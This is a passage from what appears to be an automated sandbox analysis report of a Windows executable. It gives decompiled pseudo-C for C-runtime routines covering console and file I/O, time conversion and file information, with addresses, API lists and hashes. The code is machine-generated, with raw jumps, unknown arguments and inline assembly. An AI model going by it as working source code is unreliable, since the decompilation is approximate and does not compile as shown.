				_t170 =  *((intOrPtr*)( *((intOrPtr*)(0xda91ca20 + _t292 * 8)) + 0x3b + _t308 * 8));
				if (_t170 == r9b) goto 0xda8eb0aa;
				if (_t199 == 0) goto 0xda8eb0aa;
				 *_t311 = _t170;
				_t312 = _t311 + __rdx;
				_t200 = _t199 - 1;
				 *((intOrPtr*)( *((intOrPtr*)(0xda91ca20 + _t292 * 8)) + 0x3b + _t308 * 8)) = r9b;
				if (r10b != 1) goto 0xda8eb0aa;
				_t171 =  *((intOrPtr*)( *((intOrPtr*)(0xda91ca20 + _t292 * 8)) + 0x3c + _t308 * 8));
				if (_t171 == r9b) goto 0xda8eb0aa;
				if (_t200 == 0) goto 0xda8eb0aa;
				 *_t312 = _t171;
				_t313 = _t312 + __rdx;
				 *((intOrPtr*)( *((intOrPtr*)(0xda91ca20 + _t292 * 8)) + 0x3c + _t308 * 8)) = r9b;
				if (E00007FF77FF7DA8F298C(r13d,  *((intOrPtr*)(0xda91ca20 + _t292 * 8))) == 0) goto 0xda8eb13e;
				_t254 =  *((intOrPtr*)(0xda91ca20 + _v88 * 8));
				if ( *((intOrPtr*)(_t254 + 0x38 + _t308 * 8)) - sil >= 0) goto 0xda8eb13e;
				if (GetConsoleMode(??, ??) == 0) goto 0xda8eb13e;
				if (_a8 != 2) goto 0xda8eb143;
				_t202 = _t200 - 1 >> 1;
				r8d = _t202;
				_v120 = _t285;
				if (ReadConsoleW(??, ??, ??, ??, ??) != 0) goto 0xda8eb132;
				E00007FF77FF7DA8E4308(GetLastError(), _t254, _v96);
				E00007FF77FF7DA8E9D68(_t254, _t263);
				goto 0xda8eb2b1;
				goto 0xda8eb17e;
				_v80 = sil;
				r8d = _t202;
				_v120 = _t285;
				_t151 = ReadFile(??, ??, ??, ??, ??); // executed
				if (_t151 == 0) goto 0xda8eb25d;
				if (_a32 - r12d > 0) goto 0xda8eb25d;
				if ( *((intOrPtr*)( *((intOrPtr*)(0xda91ca20 + _v88 * 8)) + 0x38 + _t308 * 8)) - sil >= 0) goto 0xda8eb123;
				_t293 = _t280 + _t254 * 2 + _a32;
				if (_a8 == 2) goto 0xda8eb1c7;
				_t278 = _t313;
				_v120 = _t306 >> 1;
				_t152 = E00007FF77FF7DA8EAA94(_t151, _t162, r13d, 0, _t263, _t278, _t286, _t293, _a16);
				goto 0xda8eb123;
				if (_v80 == sil) goto 0xda8eb24b;
				_t302 = _v72;
				_t258 = _t302;
				_t301 =  &(_t302[_t293 >> 1]);
				if (_t302 - _t301 >= 0) goto 0xda8eb23e;
				_t175 =  *_t258 & 0x0000ffff;
				if (_t175 == 0x1a) goto 0xda8eb22d;
				if (_t175 != 0xd) goto 0xda8eb213;
				_t295 =  &(_t258[1]);
				if (_t295 - _t301 >= 0) goto 0xda8eb213;
				if ( *_t295 != 0xa) goto 0xda8eb213;
				r11d = 4;
				goto 0xda8eb219;
				r11d = 2;
				 *_t302 = 0xa;
				if ( &(_t258[0x3ffbed48e510]) - _t301 < 0) goto 0xda8eb1ea;
				goto 0xda8eb23e;
				_t260 =  *((intOrPtr*)(0xda91ca20 + _t278 * 8));
				 *(_t260 + 0x38 + _t308 * 8) =  *(_t260 + 0x38 + _t308 * 8) | 0x00000002;
				goto 0xda8eb123;
				E00007FF77FF7DA8EA8D4(_t152, r13d, _t263, 0xda91ca20, _v72,  &(_t302[1]), 0xda91ca20);
				goto 0xda8eb1c0;
				if (GetLastError() != 5) goto 0xda8eb283;
				E00007FF77FF7DA8E4394(_t260);
				 *_t260 = 9;
				_t156 = E00007FF77FF7DA8E4374(_t260);
				 *_t260 = 5;
				goto 0xda8eb120;
				if (_t156 != 0x6d) goto 0xda8eb119;
				goto 0xda8eb123;
				goto 0xda8eb2b1;
				E00007FF77FF7DA8E4374(_t260);
				 *_t260 = 0xa;
				E00007FF77FF7DA8E4394(_t260);
				 *_t260 = 9;
				return E00007FF77FF7DA8E9D00() | 0xffffffff;
			}

0x7ff7da8eae7c
0x7ff7da8eae7c
0x7ff7da8eae7c
0x7ff7da8eae81
0x7ff7da8eae9b
0x7ff7da8eaea2
0x7ff7da8eaea4
0x7ff7da8eaeab
0x7ff7da8eaead
0x7ff7da8eaeb2
0x7ff7da8eaeb8
0x7ff7da8eaec1
0x7ff7da8eaec7
0x7ff7da8eaece
0x7ff7da8eaed7
0x7ff7da8eaed7
0x7ff7da8eaedd
0x7ff7da8eaeec
0x7ff7da8eaef0
0x7ff7da8eaef5
0x7ff7da8eaef9
0x7ff7da8eaf02
0x7ff7da8eaf0f
0x7ff7da8eaf11
0x7ff7da8eaf16
0x7ff7da8eaf18
0x7ff7da8eaf1d
0x7ff7da8eaf23
0x7ff7da8eaf2b
0x7ff7da8eaf37
0x7ff7da8eaf3d
0x7ff7da8eaf40
0x7ff7da8eaf4a
0x7ff7da8eaf55
0x7ff7da8eaf5d
0x7ff7da8eaf67
0x7ff7da8eaf6b
0x7ff7da8eaf74
0x7ff7da8eaf76
0x7ff7da8eaf7b
0x7ff7da8eaf7d
0x7ff7da8eaf82
0x7ff7da8eaf88
0x7ff7da8eaf8d
0x7ff7da8eaf98
0x7ff7da8eafa1
0x7ff7da8eafaa
0x7ff7da8eafaf
0x7ff7da8eafb6
0x7ff7da8eafb9
0x7ff7da8eafc0
0x7ff7da8eafc5
0x7ff7da8eafcb
0x7ff7da8eafcd
0x7ff7da8eafd2
0x7ff7da8eafd8
0x7ff7da8eafdd
0x7ff7da8eafe3
0x7ff7da8eafed
0x7ff7da8eafed
0x7ff7da8eaff1
0x7ff7da8eaff6
0x7ff7da8eb002
0x7ff7da8eb013
0x7ff7da8eb018
0x7ff7da8eb01e
0x7ff7da8eb023
0x7ff7da8eb02f
0x7ff7da8eb031
0x7ff7da8eb039
0x7ff7da8eb03d
0x7ff7da8eb03f
0x7ff7da8eb042
0x7ff7da8eb048
0x7ff7da8eb04d
0x7ff7da8eb055
0x7ff7da8eb05b
0x7ff7da8eb063
0x7ff7da8eb067
0x7ff7da8eb069
0x7ff7da8eb074
0x7ff7da8eb077
0x7ff7da8eb079
0x7ff7da8eb081
0x7ff7da8eb087
0x7ff7da8eb08f
0x7ff7da8eb093
0x7ff7da8eb095
0x7ff7da8eb0a0
0x7ff7da8eb0a5
0x7ff7da8eb0b4
0x7ff7da8eb0c6
0x7ff7da8eb0cf
0x7ff7da8eb0e3
0x7ff7da8eb0ed
0x7ff7da8eb0fc
0x7ff7da8eb101
0x7ff7da8eb104
0x7ff7da8eb111
0x7ff7da8eb11b
0x7ff7da8eb126
0x7ff7da8eb12d
0x7ff7da8eb13c
0x7ff7da8eb13e
0x7ff7da8eb150
0x7ff7da8eb153
0x7ff7da8eb15b
0x7ff7da8eb163
0x7ff7da8eb171
0x7ff7da8eb193
0x7ff7da8eb19d
0x7ff7da8eb1a0
0x7ff7da8eb1b0
0x7ff7da8eb1b6
0x7ff7da8eb1bb
0x7ff7da8eb1c2
0x7ff7da8eb1cf
0x7ff7da8eb1d1
0x7ff7da8eb1d6
0x7ff7da8eb1dc
0x7ff7da8eb1e3
0x7ff7da8eb1ea
0x7ff7da8eb1f1
0x7ff7da8eb1f7
0x7ff7da8eb1f9
0x7ff7da8eb200
0x7ff7da8eb206
0x7ff7da8eb20b
0x7ff7da8eb211
0x7ff7da8eb213
0x7ff7da8eb21c
0x7ff7da8eb229
0x7ff7da8eb22b
0x7ff7da8eb234
0x7ff7da8eb238
0x7ff7da8eb246
0x7ff7da8eb253
0x7ff7da8eb258
0x7ff7da8eb266
0x7ff7da8eb268
0x7ff7da8eb26d
0x7ff7da8eb273
0x7ff7da8eb278
0x7ff7da8eb27e
0x7ff7da8eb286
0x7ff7da8eb28e
0x7ff7da8eb295
0x7ff7da8eb297
0x7ff7da8eb29c
0x7ff7da8eb29e
0x7ff7da8eb2a3
0x7ff7da8eb2c8

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7DA8EB2A9

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 91ee52e53b938f04e3ca067b9ec35c517ea927f4dccd8ae40ab0dd36a53119b0
Instruction ID: 844910733d293e58ea6f1fdd2ae775f2585802e2b94ba741d24b2357a207e1a7
Opcode Fuzzy Hash: 91ee52e53b938f04e3ca067b9ec35c517ea927f4dccd8ae40ab0dd36a53119b0
Instruction Fuzzy Hash: 65C1D522A1C687C1F612AB1194082BDFB91FFA1B90FD58172DE4D03793DE7EE6658320

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8EC380 Relevance: 6.2, APIs: 4, Instructions: 218
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 35%

			E00007FF77FF7DA8EC380(void* __ebx, signed int __ecx, void* __esi, void* __rax, void* __rcx, signed short* __rdx, void* __r8, signed int __r9, void* __r10, void* __r11) {
				signed long long _v88;
				char _v96;
				void* _v108;
				signed int _v112;
				intOrPtr _v120;
				signed int _v124;
				long _v128;
				signed int _v136;
				long long _v144;
				signed int _v152;
				void* __rbx;
				void* __rsi;
				void* __rbp;
				signed short _t99;
				void* _t107;
				int _t115;
				long _t116;
				signed int _t117;
				void* _t122;
				signed short _t127;
				signed int _t130;
				signed short _t133;
				signed short _t158;
				signed short _t166;
				signed long long _t179;
				signed int _t183;
				signed short* _t196;
				signed int _t203;
				signed int _t204;
				signed short* _t205;
				void* _t207;
				void* _t217;
				void* _t218;
				signed long long _t220;
				void* _t221;
				signed long long _t222;
				signed long long _t223;
				void* _t224;
				signed short* _t226;

				_t218 = __r11;
				_t217 = __r10;
				_t196 = __rdx;
				_t122 = __ebx;
				r14d = r8d;
				_t183 = __r9;
				_t205 = __rdx;
				if (r8d == 0) goto 0xda8ec673;
				if (__rdx != 0) goto 0xda8ec3e7;
				 *((char*)(__r9 + 0x38)) = 1;
				r8d = 0;
				 *((intOrPtr*)(__r9 + 0x34)) = 0;
				 *((char*)(__r9 + 0x30)) = 1;
				 *((intOrPtr*)(__r9 + 0x2c)) = 0x16;
				r9d = 0;
				_v144 = __r9;
				_v152 = _t204;
				E00007FF77FF7DA8E9C34(__rax, __r9, __rcx, __rdx, __rdx, _t207, __r8);
				goto 0xda8ec675;
				_t220 = __ecx >> 6;
				_v88 = _t220;
				_t223 = __ecx + __ecx * 8;
				_t99 =  *((intOrPtr*)(0xda91ca20 + 0x39 + _t223 * 8));
				_v136 = _t99;
				if (_t99 - 1 - 1 > 0) goto 0xda8ec41e;
				if (( !r14d & 0x00000001) == 0) goto 0xda8ec3b0;
				if (( *( *((intOrPtr*)(0xda91ca20 + _t220 * 8)) + 0x38 + _t223 * 8) & 0x00000020) == 0) goto 0xda8ec434;
				_t23 = _t196 + 2; // 0x2
				r8d = _t23;
				0xda8eb740();
				_v112 = _t204;
				if (E00007FF77FF7DA8F298C(r15d, __ecx) == 0) goto 0xda8ec563;
				if ( *( *((intOrPtr*)(0xda91ca20 + _t220 * 8)) + 0x38 + _t223 * 8) - dil >= 0) goto 0xda8ec563;
				if ( *((intOrPtr*)(__r9 + 0x28)) != dil) goto 0xda8ec473;
				E00007FF77FF7DA8E3970( *((intOrPtr*)(0xda91ca20 + _t220 * 8)), __r9, __r9, _t205);
				if ( *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x18)) + 0x138)) != _t204) goto 0xda8ec48f;
				_t179 =  *((intOrPtr*)(0xda91ca20 + _t220 * 8));
				if ( *((intOrPtr*)(_t179 + 0x39 + _t223 * 8)) == dil) goto 0xda8ec563;
				if (GetConsoleMode(??, ??) == 0) goto 0xda8ec55c;
				_t127 = _v136;
				_t158 = _t127;
				if (_t158 == 0) goto 0xda8ec539;
				if (_t158 == 0) goto 0xda8ec4c4;
				if (_t127 - 1 != 1) goto 0xda8ec5fd;
				_t221 = _t205 + _t224;
				_v128 = _t204;
				_t226 = _t205;
				if (_t205 - _t221 >= 0) goto 0xda8ec530;
				r14d = _v124;
				_v136 =  *_t226 & 0x0000ffff;
				_t107 = E00007FF77FF7DA8F2A58( *_t226 & 0xffff);
				_t130 = _v136 & 0x0000ffff;
				if (_t107 != _t130) goto 0xda8ec527;
				r14d = r14d + 2;
				_v124 = r14d;
				if (_t130 != 0xa) goto 0xda8ec51c;
				if (E00007FF77FF7DA8F2A58(0xd) != 0xd) goto 0xda8ec527;
				r14d = r14d + 1;
				_v124 = r14d;
				if ( &(_t226[1]) - _t221 >= 0) goto 0xda8ec530;
				goto 0xda8ec4d8;
				_v128 = GetLastError();
				_t222 = _v88;
				goto 0xda8ec5f3;
				r9d = r14d;
				_v152 = __r9;
				E00007FF77FF7DA8EB9C0(_t109, r15d, __esi, __r9,  &_v128,  &_v96, _t205);
				asm("movsd xmm0, [eax]");
				goto 0xda8ec5f8;
				if ( *((intOrPtr*)( *((intOrPtr*)(0xda91ca20 + _t222 * 8)) + 0x38 + _t223 * 8)) - dil >= 0) goto 0xda8ec5c0;
				_t133 = _v136;
				_t166 = _t133;
				if (_t166 == 0) goto 0xda8ec5ac;
				if (_t166 == 0) goto 0xda8ec598;
				if (_t133 - 1 != 1) goto 0xda8ec604;
				r9d = r14d;
				E00007FF77FF7DA8EBF3C(_t122, r15d, _t179, _t183,  &_v128, _t207, _t205, _t217, _t218);
				goto 0xda8ec550;
				r9d = r14d;
				E00007FF77FF7DA8EC058(r15d,  *((intOrPtr*)(_t179 + 8)), _t179, _t183,  &_v128, _t207, _t205, _t217, _t218);
				goto 0xda8ec550;
				r9d = r14d;
				E00007FF77FF7DA8EBE38(_t122, _t133 - 1, r15d, _t179, _t183,  &_v128, _t207, _t205, _t217, _t218);
				goto 0xda8ec550;
				r8d = r14d;
				_v152 = _v152 & _t179;
				_v128 = _t179;
				_v120 = 0;
				_t115 = WriteFile(??, ??, ??, ??, ??); // executed
				if (_t115 != 0) goto 0xda8ec5f0;
				_t116 = GetLastError();
				_v128 = _t116;
				asm("movsd xmm0, [ebp-0x40]");
				asm("movsd [ebp-0x30], xmm0");
				if (_t116 != 0) goto 0xda8ec66c;
				_t117 = _v112;
				if (_t117 == 0) goto 0xda8ec643;
				if (_t117 != 5) goto 0xda8ec633;
				 *((char*)(_t183 + 0x30)) = 1;
				 *((intOrPtr*)(_t183 + 0x2c)) = 9;
				 *((char*)(_t183 + 0x38)) = 1;
				 *(_t183 + 0x34) = _t117;
				goto 0xda8ec3df;
				_t203 = _t183;
				E00007FF77FF7DA8E4350(_v112, _t203);
				goto 0xda8ec3df;
				if (( *( *((intOrPtr*)(_t203 + _t222 * 8)) + 0x38 + _t223 * 8) & 0x00000040) == 0) goto 0xda8ec654;
				if ( *_t205 == 0x1a) goto 0xda8ec673;
				 *(_t183 + 0x34) =  *(_t183 + 0x34) & 0x00000000;
				 *((char*)(_t183 + 0x30)) = 1;
				 *((intOrPtr*)(_t183 + 0x2c)) = 0x1c;
				 *((char*)(_t183 + 0x38)) = 1;
				goto 0xda8ec3df;
				goto 0xda8ec675;
				return 0;
			}

0x7ff7da8ec380
0x7ff7da8ec380
0x7ff7da8ec380
0x7ff7da8ec380
0x7ff7da8ec396
0x7ff7da8ec39c
0x7ff7da8ec39f
0x7ff7da8ec3a5
0x7ff7da8ec3ae
0x7ff7da8ec3b0
0x7ff7da8ec3b5
0x7ff7da8ec3b8
0x7ff7da8ec3be
0x7ff7da8ec3c5
0x7ff7da8ec3cd
0x7ff7da8ec3d0
0x7ff7da8ec3d5
0x7ff7da8ec3da
0x7ff7da8ec3e2
0x7ff7da8ec3f7
0x7ff7da8ec3fb
0x7ff7da8ec3ff
0x7ff7da8ec407
0x7ff7da8ec40c
0x7ff7da8ec413
0x7ff7da8ec41c
0x7ff7da8ec424
0x7ff7da8ec42b
0x7ff7da8ec42b
0x7ff7da8ec42f
0x7ff7da8ec437
0x7ff7da8ec449
0x7ff7da8ec458
0x7ff7da8ec462
0x7ff7da8ec467
0x7ff7da8ec47e
0x7ff7da8ec480
0x7ff7da8ec489
0x7ff7da8ec4a4
0x7ff7da8ec4aa
0x7ff7da8ec4ae
0x7ff7da8ec4b0
0x7ff7da8ec4b9
0x7ff7da8ec4be
0x7ff7da8ec4c4
0x7ff7da8ec4c8
0x7ff7da8ec4cc
0x7ff7da8ec4d2
0x7ff7da8ec4d4
0x7ff7da8ec4df
0x7ff7da8ec4e3
0x7ff7da8ec4e8
0x7ff7da8ec4ef
0x7ff7da8ec4f1
0x7ff7da8ec4f5
0x7ff7da8ec4fd
0x7ff7da8ec511
0x7ff7da8ec513
0x7ff7da8ec516
0x7ff7da8ec523
0x7ff7da8ec525
0x7ff7da8ec52d
0x7ff7da8ec530
0x7ff7da8ec534
0x7ff7da8ec539
0x7ff7da8ec53c
0x7ff7da8ec54b
0x7ff7da8ec550
0x7ff7da8ec557
0x7ff7da8ec56c
0x7ff7da8ec56e
0x7ff7da8ec572
0x7ff7da8ec574
0x7ff7da8ec579
0x7ff7da8ec57e
0x7ff7da8ec584
0x7ff7da8ec591
0x7ff7da8ec596
0x7ff7da8ec598
0x7ff7da8ec5a5
0x7ff7da8ec5aa
0x7ff7da8ec5ac
0x7ff7da8ec5b9
0x7ff7da8ec5be
0x7ff7da8ec5cb
0x7ff7da8ec5ce
0x7ff7da8ec5d6
0x7ff7da8ec5da
0x7ff7da8ec5dd
0x7ff7da8ec5e5
0x7ff7da8ec5e7
0x7ff7da8ec5ed
0x7ff7da8ec5f3
0x7ff7da8ec5f8
0x7ff7da8ec60e
0x7ff7da8ec610
0x7ff7da8ec615
0x7ff7da8ec61a
0x7ff7da8ec61c
0x7ff7da8ec620
0x7ff7da8ec627
0x7ff7da8ec62b
0x7ff7da8ec62e
0x7ff7da8ec636
0x7ff7da8ec639
0x7ff7da8ec63e
0x7ff7da8ec64d
0x7ff7da8ec652
0x7ff7da8ec654
0x7ff7da8ec658
0x7ff7da8ec65c
0x7ff7da8ec663
0x7ff7da8ec667
0x7ff7da8ec671
0x7ff7da8ec685

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF7DA8EC36B), ref: 00007FF7DA8EC49C
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF7DA8EC36B), ref: 00007FF7DA8EC527

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: 866ede3298fa327e1352ae7a751efdd83158b4407a9a6bcee0e24f0a144bec6f
Instruction ID: 35ffa1d46ce3754681518a236350748ea23c3f3e22c6dc510897bc2ab61ea3d4
Opcode Fuzzy Hash: 866ede3298fa327e1352ae7a751efdd83158b4407a9a6bcee0e24f0a144bec6f
Instruction Fuzzy Hash: 039125B2F08652C5F712AF2584402BDABA0BB64B88FD441BBDE0E53696CF3DD552C760

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8EE82C Relevance: 6.2, APIs: 4, Instructions: 162
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 97%

			E00007FF77FF7DA8EE82C(signed int __edx, void* __edi, void* __rcx, void* __rdx, intOrPtr _a40, intOrPtr _a48, intOrPtr _a56) {
				signed int _v80;
				intOrPtr _v92;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v112;
				intOrPtr _v116;
				char _v120;
				intOrPtr _v124;
				char _v128;
				char _v132;
				char _v136;
				intOrPtr _t49;
				void* _t53;
				void* _t65;
				intOrPtr _t67;
				signed long long _t86;
				intOrPtr _t88;
				signed long long _t110;
				intOrPtr _t112;
				void* _t117;
				intOrPtr* _t118;
				void* _t120;
				signed long long _t140;
				void* _t143;
				void* _t146;
				intOrPtr* _t152;

				_t110 =  *0xda90d008; // 0xde4e6c2f3c2e
				_v80 = _t110 ^ _t146 - 0x00000078;
				_t67 = __rcx - 0x76c;
				_t86 = r8d;
				_t140 = __edx;
				if (_t67 - 0x46 < 0) goto 0xda8eea1e;
				_t112 = _t67;
				if (_t112 - 0x44d > 0) goto 0xda8eea1e;
				_t49 = __edx - 1;
				_v124 = _t49;
				if (_t49 - 0xb > 0) goto 0xda8eea1e;
				if (r8d <= 0) goto 0xda8eea1e;
				if (r8d -  *((intOrPtr*)(0xda9077a0 + __edx * 4)) -  *((intOrPtr*)(0xda9077a0 + __edx * 4 - 4)) <= 0) goto 0xda8ee8d0;
				if (E00007FF77FF7DA8EE7D0(_t67, r8d -  *((intOrPtr*)(0xda9077a0 + __edx * 4)) -  *((intOrPtr*)(0xda9077a0 + __edx * 4 - 4))) == 0) goto 0xda8eea1e;
				if (__edi != 2) goto 0xda8eea1e;
				if (_t86 - 0x1d > 0) goto 0xda8eea1e;
				if (r13d - 0x17 > 0) goto 0xda8eea1e;
				if (r12d - 0x3b > 0) goto 0xda8eea1e;
				if (r15d - 0x3b > 0) goto 0xda8eea1e;
				_t53 = E00007FF77FF7DA8EE7D0(_t67, r15d - 0x3b);
				r14d = 0;
				if (_t53 == 0) goto 0xda8ee907;
				if (__edi - 2 <= 0) goto 0xda8ee907;
				_t88 = _t86 +  *((intOrPtr*)(0xda9077a0 + _t140 * 4 - 4)) + 1; // executed
				E00007FF77FF7DA8F5304(_t112); // executed
				_v128 = r14d;
				_v132 = r14d;
				_v136 = r14d;
				if (E00007FF77FF7DA8F4708(_t112,  &_v128) != 0) goto 0xda8eea4a;
				if (E00007FF77FF7DA8F4738(_t112,  &_v132) != 0) goto 0xda8eea4a;
				if (E00007FF77FF7DA8F4768(_t112,  &_v136) != 0) goto 0xda8eea4a;
				r10d = 0x51eb851f;
				r8d = _t120 - 1;
				r9d = r10d * (_t120 + 0x12b) >> 0x20;
				r9d = r9d >> 7;
				r9d = r9d + (r9d >> 0x1f);
				r9d = r9d - (r10d * r8d >> 0x20 >> 5) + (r10d * r8d >> 0x20 >> 5 >> 0x1f);
				asm("cdq");
				_t143 = ((((__rdx + _t112 >> 2) + 0xffffffef + r9d + (_t67 + 0xffffffba) * 0x16d + _t88 + ((__rdx + _t112 >> 2) + 0xffffffef + r9d + (_t67 + 0xffffffba) * 0x16d + _t88) * 2) * 8 + r9d) * 0x3c + _a40) * 0x3c + _v136 + _a48;
				_t152 = _v132 + _t143;
				if (_a56 == 1) goto 0xda8eea19;
				_v104 = _v124;
				_v92 = _t88;
				_v100 = _t67;
				_v112 = r13d;
				_v116 = r12d;
				_v120 = r15d;
				if (_a56 != 0xffffffff) goto 0xda8eea14;
				if (_v128 == 0) goto 0xda8eea14;
				E00007FF77FF7DA8F5348( &_v120);
				_t144 =  !=  ? _t152 : _t143;
				_t117 =  !=  ? _t152 : _t143;
				goto 0xda8eea2d;
				_t118 = _t152;
				goto 0xda8eea2d;
				_t65 = E00007FF77FF7DA8E4394(_t118);
				 *_t118 = 0x16;
				return E00007FF77FF7DA8DACF0(_t65, (__rdx + _t112 >> 2) + 0xffffffef + r9d, _v80 ^ _t146 - 0x00000078);
			}

0x7ff7da8ee840
0x7ff7da8ee84a
0x7ff7da8ee852
0x7ff7da8ee85c
0x7ff7da8ee862
0x7ff7da8ee868
0x7ff7da8ee86e
0x7ff7da8ee877
0x7ff7da8ee87d
0x7ff7da8ee880
0x7ff7da8ee886
0x7ff7da8ee88f
0x7ff7da8ee8a6
0x7ff7da8ee8b1
0x7ff7da8ee8ba
0x7ff7da8ee8c3
0x7ff7da8ee8d4
0x7ff7da8ee8de
0x7ff7da8ee8e8
0x7ff7da8ee8f4
0x7ff7da8ee8f9
0x7ff7da8ee8fe
0x7ff7da8ee903
0x7ff7da8ee905
0x7ff7da8ee907
0x7ff7da8ee910
0x7ff7da8ee914
0x7ff7da8ee918
0x7ff7da8ee923
0x7ff7da8ee934
0x7ff7da8ee945
0x7ff7da8ee955
0x7ff7da8ee95b
0x7ff7da8ee967
0x7ff7da8ee96d
0x7ff7da8ee97d
0x7ff7da8ee987
0x7ff7da8ee98a
0x7ff7da8ee9d5
0x7ff7da8ee9d8
0x7ff7da8ee9df
0x7ff7da8ee9e8
0x7ff7da8ee9eb
0x7ff7da8ee9ee
0x7ff7da8ee9f1
0x7ff7da8ee9f5
0x7ff7da8ee9f9
0x7ff7da8ee9fd
0x7ff7da8eea03
0x7ff7da8eea09
0x7ff7da8eea10
0x7ff7da8eea14
0x7ff7da8eea17
0x7ff7da8eea19
0x7ff7da8eea1c
0x7ff7da8eea1e
0x7ff7da8eea23
0x7ff7da8eea49

APIs

_get_daylight.LIBCMT ref: 00007FF7DA8EE91C
_get_daylight.LIBCMT ref: 00007FF7DA8EE92D
_get_daylight.LIBCMT ref: 00007FF7DA8EE93E
_isindst.LIBCMT ref: 00007FF7DA8EEA09

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: _get_daylight$_isindst
String ID:
API String ID: 4170891091-0
Opcode ID: f648b83e3cb410d1bce6a6d96ba3f226e96b8c179cb4383b6c0ac88b0926170b
Instruction ID: 9e96a7435e243e58a16f07255a720f9695ff9232f27c24a0a17768a34c552146
Opcode Fuzzy Hash: f648b83e3cb410d1bce6a6d96ba3f226e96b8c179cb4383b6c0ac88b0926170b
Instruction Fuzzy Hash: 53513872F042129AFB15EF64D9416BCA7A1BB30358FD0413ADD1D52AD6DF3DA621C710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8E4724 Relevance: 6.1, APIs: 4, Instructions: 119
pipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 49%

			E00007FF77FF7DA8E4724(intOrPtr __edx, long long __rbx, void* __rcx, void* __r8, intOrPtr* __r9, long long _a16) {
				signed int _v56;
				intOrPtr _v64;
				signed int _v76;
				intOrPtr _v80;
				intOrPtr _v92;
				intOrPtr _v100;
				intOrPtr _v108;
				intOrPtr _v112;
				signed int _v120;
				signed long long _v128;
				long long _v136;
				void* __rsi;
				void* __rbp;
				long _t37;
				intOrPtr _t40;
				int _t42;
				signed int _t47;
				intOrPtr _t60;
				long _t61;
				signed long long _t78;
				signed long long _t79;
				intOrPtr _t89;
				void* _t102;

				_a16 = __rbx;
				_t78 =  *0xda90d008; // 0xde4e6c2f3c2e
				_t79 = _t78 ^ _t102 - 0x00000080;
				_v56 = _t79;
				r14d = __edx; // executed
				_t37 = GetFileType(??); // executed
				r15d = 1;
				asm("btr ecx, 0xf");
				if (_t37 != r15d) goto 0xda8e482f;
				 *((intOrPtr*)(__r9 + 8)) = r15w;
				if (__rcx == 0) goto 0xda8e479e;
				_v120 = _v120 & 0x00000000;
				if (E00007FF77FF7DA8E4B44(__rcx,  &_v120, __r8) == 0) goto 0xda8e4846;
				_t40 = _v120 - 1;
				 *((intOrPtr*)(__r9 + 0x10)) = _t40;
				 *__r9 = _t40;
				asm("xorps xmm0, xmm0");
				asm("movups [ebp-0x48], xmm0");
				_v64 = 0;
				asm("movups [ebp-0x38], xmm0");
				asm("movups [ebp-0x28], xmm0"); // executed
				_t42 = GetFileInformationByHandle(??, ??); // executed
				if (_t42 == 0) goto 0xda8e484a;
				_t60 = _v112;
				_t96 = __rcx;
				 *((short*)(__r9 + 6)) = E00007FF77FF7DA8E4A08(_t60, __r9, __rcx, __r8, _t102);
				E00007FF77FF7DA8E48CC(_t60, _v92, _t96); // executed
				 *(__r9 + 0x20) = _t79;
				E00007FF77FF7DA8E48CC(_t60, _v100, _t79); // executed
				_t89 = _v108;
				 *(__r9 + 0x18) = _t79;
